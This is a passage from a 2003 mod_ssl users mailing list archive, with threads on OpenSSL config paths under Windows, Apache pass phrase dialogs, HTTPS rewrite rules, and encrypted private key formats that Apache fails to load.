From owner-modssl-users@modssl.org  Fri Jan 17 19:01:50 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 926122AA0A3; Fri, 17 Jan 2003 19:01:50 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from SOTTMXS01.entrust.com (mail.entrust.com [216.191.251.35])
	by master.modssl.org (Postfix) with ESMTP id BF38C2AA08B
	for ; Fri, 17 Jan 2003 19:01:43 +0100 (CET)
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Fri, 17 Jan 2003 13:01:39 -0500
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: win32 apache and ssl
Date: Fri, 17 Jan 2003 13:01:38 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2BE52.7B792D90"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2BE52.7B792D90
Content-Type: text/plain;
	charset="windows-1252"


Hi,

Using http://hunter.campbus.com/Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip

I was able to create a private key but when I tried to create the CSR 
I received

OpenSSL> req -key privatekey.key -out csr.txt
Using configuration from /usr/local/ssl/openssl.cnf
Unable to load config info
Enter PEM pass phrase:

I type in the pass phrase and it just hangs.

I'm on a win 2000 sp2 box.
Do you know why it's looking for /usr/local/ssl/openssl.cnf ?

Thanks,
R

------_=_NextPart_001_01C2BE52.7B792D90
Content-Type: text/html;
	charset="windows-1252"
Content-Transfer-Encoding: quoted-printable






win32 apache and ssl






Hi,




Using http://hunter.campbus.com/Apache_2.0.42-OpenSSL_0.9.6g=
-Win32.zip




I was able to create a private key but when I tried =
to create the CSR 

I received




OpenSSL> req -key privatekey.key -out =
csr.txt

Using configuration from =
/usr/local/ssl/openssl.cnf

Unable to load config info

Enter PEM pass phrase:




I type in the pass phrase and it just hangs.




I'm on a win 2000 sp2 box.

Do you know why it's looking for =
/usr/local/ssl/openssl.cnf ?




Thanks,

R





------_=_NextPart_001_01C2BE52.7B792D90--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 17 20:11:49 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0493B2AA0A3; Fri, 17 Jan 2003 20:11:48 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from communicate.01com.com (communicate.01com.com [209.146.248.130])
	by master.modssl.org (Postfix) with ESMTP id 6C56A2AA087
	for ; Fri, 17 Jan 2003 20:11:38 +0100 (CET)
Received: from 01com.com (DEV_STRAKHOV_98 [10.0.0.43]) by communicate.01com.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
	id C67LBNAY; Fri, 17 Jan 2003 14:10:42 -0500
Message-ID: <3E28547D.BF722861@01com.com>
Date: Fri, 17 Jan 2003 14:07:41 -0500
From: Sergey Strakhov 
X-Mailer: Mozilla 4.61 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: win32 apache and ssl
References: 
Content-Type: multipart/alternative;
 boundary="------------0753F422D7782000C3D2C1F0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sergey Strakhov 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--------------0753F422D7782000C3D2C1F0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit

> I'm on a win 2000 sp2 box.
> Do you know why it's looking for /usr/local/ssl/openssl.cnf ?

This is the default place for the config file of OpenSSL on Unix
platforms.
You can change it with the command line option -config .
Otherwise you can create C:\usr\local\ssl\openssl.cnf  (assuming you run
openssl from some directory on your drive C:)...




--------------0753F422D7782000C3D2C1F0
Content-Type: text/html; charset=koi8-r
Content-Transfer-Encoding: 7bit





I'm on a win 2000 sp2 box.

Do you know why it's looking for /usr/local/ssl/openssl.cnf
?

This is the default place for the config file of OpenSSL on Unix platforms.

You can change it with the command line option -config .

Otherwise you can create C:\usr\local\ssl\openssl.cnf  (assuming
you run openssl from some directory on your drive C:)...

 

 

 

--------------0753F422D7782000C3D2C1F0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 17 20:24:15 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 29CDC2AA08B; Fri, 17 Jan 2003 20:24:15 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from SOTTMXS01.entrust.com (mail.entrust.com [216.191.251.35])
	by master.modssl.org (Postfix) with ESMTP id 800DB2AA085
	for ; Fri, 17 Jan 2003 20:24:04 +0100 (CET)
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Fri, 17 Jan 2003 14:24:01 -0500
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: win32 apache and ssl
Date: Fri, 17 Jan 2003 14:24:00 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2BE5D.FCC48A10"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2BE5D.FCC48A10
Content-Type: text/plain;
	charset="koi8-r"

Thanks,
 
I tried 
 
openssl -config and it does not recognize the option.
 
I tried creating the directory and dummy file.
 
It does not give the error finding the file anymore however.. after typing
in the correct password it just hangs..
 
Is there a sample openssl.cnf  ?
 
Thanks,
R

-----Original Message-----
From: Sergey Strakhov [mailto:strakhov@01com.com]
Sent: Friday, January 17, 2003 2:08 PM
To: modssl-users@modssl.org
Subject: Re: win32 apache and ssl



I'm on a win 2000 sp2 box. 
Do you know why it's looking for /usr/local/ssl/openssl.cnf ?

This is the default place for the config file of OpenSSL on Unix platforms. 
You can change it with the command line option -config . 
Otherwise you can create C:\usr\local\ssl\openssl.cnf  (assuming you run
openssl from some directory on your drive C:)... 
  
  
  


------_=_NextPart_001_01C2BE5D.FCC48A10
Content-Type: text/html;
	charset="koi8-r"









Thanks,


 


I 
tried 


 


openssl -config and it does not recognize the option.


 


I 
tried creating the directory and dummy file.


 


It 
does not give the error finding the file anymore however.. after typing in the 
correct password it just hangs..


 


Is 
there a sample openssl.cnf  ?


 


Thanks,


R



  
-----Original Message-----
From: Sergey Strakhov 
  [mailto:strakhov@01com.com]
Sent: Friday, January 17, 2003 2:08 
  PM
To: modssl-users@modssl.org
Subject: Re: win32 apache 
  and ssl


  
I'm on a win 2000 sp2 box. 
    
Do you know why it's looking for 
    /usr/local/ssl/openssl.cnf ?
This is the default place for 
  the config file of OpenSSL on Unix platforms. 
You can change it with the 
  command line option -config . 
Otherwise you can create 
  C:\usr\local\ssl\openssl.cnf  (assuming you run openssl from some 
  directory on your drive C:)... 
  
  
  



------_=_NextPart_001_01C2BE5D.FCC48A10--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 17 20:33:19 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 80A072AA08B; Fri, 17 Jan 2003 20:33:19 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from SOTTMXS01.entrust.com (mail.entrust.com [216.191.251.35])
	by master.modssl.org (Postfix) with ESMTP id BEDB32AA085
	for ; Fri, 17 Jan 2003 20:33:17 +0100 (CET)
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Fri, 17 Jan 2003 14:33:15 -0500
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: win32 apache and ssl
Date: Fri, 17 Jan 2003 14:33:13 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2BE5F.46D54DF0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2BE5F.46D54DF0
Content-Type: text/plain;
	charset="koi8-r"

Sorry, nevermind .. I got it working.. 
 
Thanks for the help.

-----Original Message-----
From: Robert Lagana [mailto:Robert.Lagana@entrust.com]
Sent: Friday, January 17, 2003 2:24 PM
To: 'modssl-users@modssl.org'
Subject: RE: win32 apache and ssl


Thanks,
 
I tried 
 
openssl -config and it does not recognize the option.
 
I tried creating the directory and dummy file.
 
It does not give the error finding the file anymore however.. after typing
in the correct password it just hangs..
 
Is there a sample openssl.cnf  ?
 
Thanks,
R

-----Original Message-----
From: Sergey Strakhov [mailto:strakhov@01com.com]
Sent: Friday, January 17, 2003 2:08 PM
To: modssl-users@modssl.org
Subject: Re: win32 apache and ssl



I'm on a win 2000 sp2 box. 
Do you know why it's looking for /usr/local/ssl/openssl.cnf ?

This is the default place for the config file of OpenSSL on Unix platforms. 
You can change it with the command line option -config . 
Otherwise you can create C:\usr\local\ssl\openssl.cnf  (assuming you run
openssl from some directory on your drive C:)... 
  
  
  


------_=_NextPart_001_01C2BE5F.46D54DF0
Content-Type: text/html;
	charset="koi8-r"









Sorry, 
nevermind .. I got it working.. 


 


Thanks 
for the help.



  
-----Original Message-----
From: Robert Lagana 
  [mailto:Robert.Lagana@entrust.com]
Sent: Friday, January 17, 2003 
  2:24 PM
To: 'modssl-users@modssl.org'
Subject: RE: win32 
  apache and ssl


  
Thanks,

  
 

  
I 
  tried 

  
 

  
openssl -config and it does not recognize the 
  option.

  
 

  
I 
  tried creating the directory and dummy file.

  
 

  
It 
  does not give the error finding the file anymore however.. after typing in the 
  correct password it just hangs..

  
 

  
Is 
  there a sample openssl.cnf  ?

  
 

  
Thanks,

  
R

  

    
-----Original Message-----
From: Sergey Strakhov 
    [mailto:strakhov@01com.com]
Sent: Friday, January 17, 2003 2:08 
    PM
To: modssl-users@modssl.org
Subject: Re: win32 apache 
    and ssl


    
I'm on a win 2000 sp2 box. 
      
Do you know why it's looking for 
      /usr/local/ssl/openssl.cnf ?
This is the default place 
    for the config file of OpenSSL on Unix platforms. 
You can change it with 
    the command line option -config . 
Otherwise you can create 
    C:\usr\local\ssl\openssl.cnf  (assuming you run openssl from some 
    directory on your drive C:)... 
  
  
  



------_=_NextPart_001_01C2BE5F.46D54DF0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 17 21:35:40 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 02A712AA0A3; Fri, 17 Jan 2003 21:35:39 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 4E33B2AA087
	for ; Fri, 17 Jan 2003 21:35:38 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 04C89807A7
	for ; Fri, 17 Jan 2003 02:29:55 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: fqhostname found, pass phrase gone
Date: Fri, 17 Jan 2003 02:29:55 -0600
User-Agent: KMail/1.4.3
References: <200301160055.40438.aputnam@pelathe.org>  <200301170140.41642.aputnam@pelathe.org>
In-Reply-To: <200301170140.41642.aputnam@pelathe.org>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200301170229.55847.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Friday 17 January 2003 01:40, you wrote:
Okay, I found the FQHOSTNAME buried in YaST. (Thank you Carlos!) Except n=
ow=20
I'm running into another problem. After setting the FQHOSTNAME, I turned =
on
the mod_ssl module, restarted apache and got this error:


/etc/init.d/apache start returned 7 (Program is not running.)
Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
Phrase Dialog)
Some of your private key files are encrypted for security reasons.
In order to read them you have to provide us with the pass phrases.

Server new.host.name:443 (RSA)
Enter pass phrase:
Apache:mod_ssl:Error: Private key not found.
**Stopped
stty: standard input: Inappropriate ioctl for device
=2E.failed


How do I get the pass phrase to go through without deactivating the
encryption? Is there is another file somewhere I can modify that tells
apache the pass phrase? Or, (seeing as the error says the server is
new.host.name:443) have I stupidly put the certificates in the wrong
directory? If so, what directory are they normally in by default?

Thanks.

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 18 05:24:58 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EA4732AA0AB; Sat, 18 Jan 2003 05:24:57 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.sancho2k.net (spruell.dsl.xmission.com [166.70.24.187])
	by master.modssl.org (Postfix) with SMTP id E8D682AA09D
	for ; Sat, 18 Jan 2003 05:24:52 +0100 (CET)
Received: (qmail 8139 invoked from network); 18 Jan 2003 04:25:11 -0000
Received: from win2kpro.sancho2k.net (HELO sancho2k.net) (10.0.0.3)
  by 0 with SMTP; 18 Jan 2003 04:25:11 -0000
Message-ID: <3E28DA70.1070801@sancho2k.net>
Date: Fri, 17 Jan 2003 21:39:12 -0700
From: "Sancho2k.net Lists" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: HTTP --> HTTPS rewrite not working
X-Enigmail-Version: 0.71.0.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sancho2k.net Lists" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Greetz all,

I'm trying to force one of my virtual hosts to use https when http is 
requested by a mod_rewrite rule. I am testing the implementation using 
curl.

When I specify https in my url, curl will grab the correct page:

[root@molodetz:~]# curl https://family.sancho2k.net





Sancho2k.net Family - Our family web page

But when I throw http://family.sancho2k.net ...

[root@molodetz:~]# curl http://family.sancho2k.net


This is my VirtualHost configuration:

NameVirtualHost 10.0.0.40:443

     ServerName                  family.sancho2k.net
     DocumentRoot                /var/www/htdocs/fam_public_html
     ServerAdmin                 sancho@sancho2k.net
     CustomLog                   logs/family/access_log combined
     ErrorLog                    logs/family/error_log
     TransferLog                 logs/family/ssl_access_log
     LogLevel                    debug
     SSLEngine                   on
     SSLCertificateFile          /var/www/conf/certs/family/server.crt
     SSLCertificateKeyFile       /var/www/conf/certs/family/server.key
     UseCanonicalName            off
     RewriteEngine               on
     RewriteCond                 %{SERVER_PORT}   !^443$
     RewriteRule                 ^/(.*)   https://%{SERVER_NAME}/$1 [L,R]
     #SSLVerifyClient            require
     #SSLVerifyDepth             1
     #SSLCACertificateFile       conf/certs/cacert.crt


Why is it redirecting my requests to www.sancho2k.net? This is a 
seperate virtual host I have set up:

NameVirtualHost 10.0.0.2:80

     ServerName                  www.sancho2k.net
     DocumentRoot                /var/www/htdocs
     ServerAdmin                 webmaster@sancho2k.net
     SSLEngine                   off



Thanks in advance for help.

DS

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 18 06:34:45 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 93FAD2AA0AB; Sat, 18 Jan 2003 06:34:45 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from anga.pair.com (anga.pair.com [209.68.1.103])
	by master.modssl.org (Postfix) with SMTP id DCAEE2AA09D
	for ; Sat, 18 Jan 2003 06:34:43 +0100 (CET)
Received: (qmail 39405 invoked by uid 3010); 18 Jan 2003 05:34:41 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
  by localhost with SMTP; 18 Jan 2003 05:34:41 -0000
Date: Sat, 18 Jan 2003 00:34:41 -0500 (EST)
From: Mike Thompson 
To: modssl-users@modssl.org
Subject: RSA SSL encrypted private keys unreadable by Apache?
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Thompson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


We're using RSA bsafe sslc22 libraries to generate a PKCS#8
encryypted RSA private key for Apache 2.0.39 mod_ssl
using openssl 0.9.6e. We can use the key in cleartext
but when we encrypt it Apache can't decrypt it.

The interesting thing is that the openssl rsa command
can read the key file, but Apache 2.0.39 based on the
same openssl 0.9.6e can't use the key file.

Using openssl to read / decrypt the private key and
then re-encrypting using the same passphrase produces a
key that Apache can use. I tried this using both des and
des3 encryption. Both work.

Any ideas on how to get Apache to accept the original key
the RSA routines or tweak the RSA code to produce a
key Apache can use? Thanks!

I'd guess the issue is with the encryption algorithm or
the header lines?

The RSA key is RSA private key encoded with PKCS#8
using SHA1 digest with DES-CBC in PEM format
(RFC 1421 common headers and trailers, not the
one that allows for variations.)
Here's the encrypted private key as written by the RSA
bsafe sslc22 application:

# more ssl.key/server.key
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIICoTAbBgkqhkiG9w0BBQowDgQIfkS8bOd+Y2kCAgPoBIICgK/Y7bTvu2Ja8Dez
kyb+rnxc6FEllLema2ZBziinAvCQ7/hjpUuQh35F+Vv+ZOPFRNfvJ1Saz7xyl/Oq
LIZp1fSyPwWAVHSBp+CgxXwvxDNcFAQOoiIzOMo8zF9+w0ZLPTuvVg6zPwB0r6Ga
1e0K8EngdxUvIO6+2G2ihR0iU8GufArScGFJ+5eFVn+8qgrbfAeMoaCENIX9j7uL
92jd+x76XLa9rkDzHUYbVj6EcPm4QlheE2Xwqexqj62k/q4DOcKqTHBrsj8RER4H
FYV89UPEIZwOta4xJ/7iezqJxWN+GinmNCRpNWPWpocEr1xXULYNFoiwRgpatpvx
Rm2yo2G5aG+7CI1XiCJS8JzSpqOZGEc2+OqwvFmIMf0V8wHVcwCaSak5qtcn09ia
YaipcdjEWpZuh1UwxFubqao8nRyhc1+0dPg8sGLEMXnoHo2g+hckN/TPZHxx0fM1
Z3RMJUzDX9tARdPRZZLiOxl2M6KjtItsVt78T7gDTfTvn/oqtLkEOsQNuN9aqfbT
lUUEG/OC9iHscug5QXrmokU/k5jLIiq+3P72VYUYCsgv7hn7SdKSzW1/PxqB96vE
xawXbDcBecx8lJFhhuJ8TOLyVGYLsG+DTKU+vep6hDniJqIw0aB37drd2mVPY2ow
PTV94uvAQyew/QPrWM75uol794euEyNHvyvO5tY7vc8Ns2iYIlGQAvw7A57jKSV4
Cq7Z2eNrFUT7D6K4LS/Vn+Rq4wAfeGydPHmag7sHvTGphf2C98NZxlGFkcd2Ksj8
LLCsYKNMxjrqgPcJehnf5NmVijkw8VC8gu6oeL2uVpMemkPeyy8rr9gFhS8OC1RS
j5TQ8MM=
-----END ENCRYPTED PRIVATE KEY-----


Here'e the same key after decrypting and re-encrypting using the
same passphrase using the following openssl command, I.e.

# openssl rsa -in ssl.key/server.key -des3 -out ssl.key/serverDes3.key

# more ssl.key/serverDes3.key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,730497D7F6F3D777

4rfgE6BO16NTOF2q+/HJAfG8g7LDwJ2QUIU/qBeNTV0oVCpl9XqpWfmxw9CnCoYe
WLnzPGsxMLC/ZDwy2KAUcIHVrZkN2TodY/B6trcdnRMcgx8LR097sZ0vRm10bnqG
a2M8BMmq+ie44YK9OdhTkT5s1M4RdLvMnEqqncmza2igBtjqgU0b7eqiQuSxJBFA
2oH71+TTwOP480v+yj14kKorjfTax8ImJBfdOkNNE7k/ZLr4Qwn60VbmaUFoIa2f
jqQ2QaLBXLL2Jmwgd5IlYIhput4o8yGjIaytOQYlE+UIbA8XCb2ahtvV0h/mgAs7
IAAonb2h4Js/6FswtIEfSx4U5xEdvv6REZuiLIQN7N5FyIsv3gder1GJ6KmzPGD/
JdrFKYd+klgiKchNFnkfeJyrRufmAuOHhLTKnzM0Kt33UylWsA6+n+wOrQUfOGNE
Cv0PRKmqtKLavCEMEB4PRvyO5M0SmezS4lmYV/InYYU66hheuTGkAQxndqUMot1j
sa7Ch4xI2K5I5z0tJrxoPVQ8k9joM6HNzlLgkwOTtHq567w2tlDNoCNQ1s5cSkBB
TDcWcmn13T+v9Z+Muz4JDQm9rGybSSpwhablgHALJx/ZEm3v3DTnoZsEKXcPLmXz
rYrKujhRRHMJPjvYJJTIcdeVf2WYmVB9FnsS3sfOKnhwlcsryUP05UYhd/Wg9Kvq
vuJW+uvs+SszVc8Lw6qumFf1PWXE40e22d7Nnxetaj7TvNnNpjXaIrrOd9lAV5cu
Ks9JRPz2ukwFfO1uiu7/AFIsPPWJ0OX1RX2duSo1l2Y3xsJ50iik/A==
-----END RSA PRIVATE KEY-----


For reference here is the key converted using openssl DES,
I.e. same as above but using des instead of des3 .

openssl rsa -in ssl.key/server.key -des  -out ssl.key/serverDes.key

# more ssl.key/serverDes.key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-CBC,97632E1FC12295B9

oTJlAO+8Jy/HyqgUegwnd8F7QUpjBmSgqIpmFqN++NVstkMythMvo4mHPxs2CbS2
eV3wkWsy++2/L4LOTiN3TnEjvutc6zc57XxWkCi3BVxVmc6fPm0uoZ4CeGHRy8lY
Km1XER9ruhwpgPNKS1eLPB+AZABsFnQrZ6kLBA6sBJV4h/RZv1yJKYAyhN/5jQNH
OGRPf2O1C6G6+SGIYcW77vpGT/6E9GkogfV8fuRJJTGFhliEUtoySqNGwiky96MY
u2+3s97H5Ayyxcn6bzVikaMYGBBBhoGH07BA7vkMe5IUPxLdS8ttxCDyBGJSNu+r
bQfiJK9/H5ySfC8cuqmXqkthDafpd6H7+Ycrw35tRG5QLYUgvWxNoUVStO4EM8Oh
h6jIoOlXf1WIBN1FQo6o12vUSDzZVAypmi4KXlgKKISVW3GxSTA3DzByGqb2h6s8
sn+vBOY+6llU8bnzlGv+qWdm3wdBHxmrqhWzT6tQhFKSW4zs9QCmIHull5WmH3eM
P1RDICj7fmdR1E6uW5K6Z+YTzVAqDepgZfsQfWL0/QP23WE/beVrDnk6QnERgsU7
MfJIUn2F8MFpUf6zqhhaAa5Bctt79OTuw44dQ823O48/yy61Rq5Dy8X+KI74/RyN
Wkr4TBdptSQrdk327zIM7V24WOs034QWA0jVDwKCTCsO+J3dndtMvLkIavRq8srO
72uzdOEcIVqps44W2/0K4syp05qvQo1xdjbHvAxsueHuIzepYo1kRuHy4Mn+KdBw
nhezG1HS8jB6oXozjM9FCqD7NbdJo/R0R/NQgw3XprSkXz2z1zxTvw==
-----END RSA PRIVATE KEY-----


Here's a default server key I generated through openssl independent
of the RSA application, not specifying a specific
encryption for reference:

# more ssl.key/serverDefault.key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,FE82F2B632D9E58F

fUKPwuaWTnXju1Zisx/Ore1CxOmmk/wwR6MwmOXsJKgBKRxFQXc0RUJVJPuarqdN
vRkcZoY0nvRrURqe6GayxjZmn+Tl48y1RCSaVCjfHx9zsN0+T3mrbo+HmbSFI33P
.

Incidentally, we're using an executable program to produce the
Pass Phrase for decrypting the private key specified in the
directive:
SSLPassPhraseDialog
http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslpassphrasedialog

That's unrelated to our problem though since after we decrypt /
re-encrypt with the openssl command line tool the Pass Phrase
program starts up the server no problem.

Later,          "A rainbow is only part of a circle." San Joser, CA
     ^ ^        Software Consultants:        http://www.migration.com/
     O o        Permanent:                   m.t.thompson@ieee.org
  ===-o-===     My catbox:                   http://www.madkatz.com/
Ack! Phththpph!

2001 Clean Air Champion http://www.baaqmd.gov/pie/press/cachamp01.pdf

My True Zero Emission Vehicles (TZEV) GM EV1, Toyota RAV4 EV and
my home are powered by the 100% renewable, Zero Emissions
Electricity (ZEE) 30kWh/day Solar Electric (PV) system on my
roof which will pay for itself in about 6 years, 12% annualized
return on investment:
http://www.madkatz.com/pv/index.html

Sometimes I see gas cars... In my rearview mirror! http://www.gmev.com/



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 18 07:08:12 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CA1612AA0AB; Sat, 18 Jan 2003 07:08:12 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from anga.pair.com (anga.pair.com [209.68.1.103])
	by master.modssl.org (Postfix) with SMTP id F1ABA2AA09D
	for ; Sat, 18 Jan 2003 07:08:05 +0100 (CET)
Received: (qmail 42758 invoked by uid 3010); 18 Jan 2003 06:08:02 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
  by localhost with SMTP; 18 Jan 2003 06:08:02 -0000
Date: Sat, 18 Jan 2003 01:08:02 -0500 (EST)
From: Mike Thompson 
To: modssl-users@modssl.org
Subject: fqhostname found, pass phrase gone
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Thompson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I believe what you are looking for is the SSLPassPhraseDialog
directive, typically used in the ssl.conf file.

http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslpassphrasedialog

You can take measures to obscure the passphrase or private
key in various ways but you can't protect from someone who's
gotten root access on your system and knows what they're doing.
There are numerous tricks they can use to get the private key or
passphrase though it takes a little work.

If just want the passphrase in a file, you can use the
exec:/path/to/program
option where the program is a simple shell script or similar
that echos the file to stdout for Apache.

This trick is useful also if you're debugging your own passPhrase
program like I recently did. That allows you to verify the pass phrase
independently of your program.


Later,          "A rainbow is only part of a circle." San Joser, CA
     ^ ^        Software Consultants:        http://www.migration.com/
     O o        Permanent:                   m.t.thompson@ieee.org
  ===-o-===     My catbox:                   http://www.madkatz.com/
Ack! Phththpph!

2001 Clean Air Champion http://www.baaqmd.gov/pie/press/cachamp01.pdf

My True Zero Emission Vehicle (TZEV) GM EV1 and my home are powered
by the 100% renewable, Zero Emissions Electricity (ZEE) 30kWh/day
Solar Electric (PV) system on my roof which will pay for itself in
about 6 years, 12% annualized return on investment:
http://www.madkatz.com/pv/index.html

Sometimes I see gas cars... In my rearview mirror! http://www.gmev.com/

President, Electric Auto Association, San Jose Chapter
http://www.geocities.com/sjeaa/

EV List Archive Owner,Admin  http://www.crest.org/discussion/ev/current/
Electric Vehicle Email List Instructions: (EVList members: Bookmark it!)
http://www.madkatz.com/ev/evlist.html



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 18 08:11:18 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 57CCE2AA0AB; Sat, 18 Jan 2003 08:11:18 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from raq720.uk2net.com (raq720.uk2net.com [213.239.58.49])
	by master.modssl.org (Postfix) with ESMTP id 2B06E2AA0A8
	for ; Sat, 18 Jan 2003 08:11:14 +0100 (CET)
Received: from lt (210.49.111.228.optusnet.com.au [210.49.111.228] (may be forged))
	by raq720.uk2net.com (8.9.3/8.9.3) with SMTP id HAA09483
	for ; Sat, 18 Jan 2003 07:11:06 GMT
